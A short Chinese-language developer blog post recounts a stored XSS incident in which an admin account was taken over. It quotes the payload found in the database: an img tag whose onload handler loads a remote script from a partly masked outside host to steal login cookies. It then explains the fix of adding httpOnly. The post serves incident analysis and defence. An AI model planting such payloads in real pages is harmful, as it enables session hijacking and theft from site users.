終於可以擠個空檔，寫寫這些日子的慘痛經歷。

某天產品A突然喊到，admin賬號被盜了，導致金錢丟失了。瞬間頭皮發麻，完蛋了。

趕緊排查可能出現漏洞的地方，在資料庫中找到了攻擊資料如下：

[p][img srC=\"/project//emotion/images/tsj/t_0004.gif\" onload=\"jQuery.getScript('https://x.****.com/kuF4')\"/][/p]

專案中有富文字編輯器，編輯器在提交時已經將指令碼關鍵字過濾掉了。

god! 攻擊者直接攻擊介面，將惡意資料插入到了庫裡，在展示此頁面的資料時必定會載入以及執行程式碼中的相關指令碼。

分析下js指令碼中的內容是直接竊取使用者登入cookies的。

去看專案相關cookies，沒有設定httpOnly，這樣使用者登入資訊對所有站點指令碼就是完全公開的，攻擊者拿到cookies輕而易舉。攻擊內容中新增有吸引力的內容，使用者去訪問有問題網頁的概率會大大增加，使用者丟失資訊是必然。

伺服器端補上了httpOnly屬性，這個洞算是堵上了。

可指令碼還是會執行這個問題得解決呀，怎麼辦呢？下一篇繼續

有什麼好的建議，多多交流喲。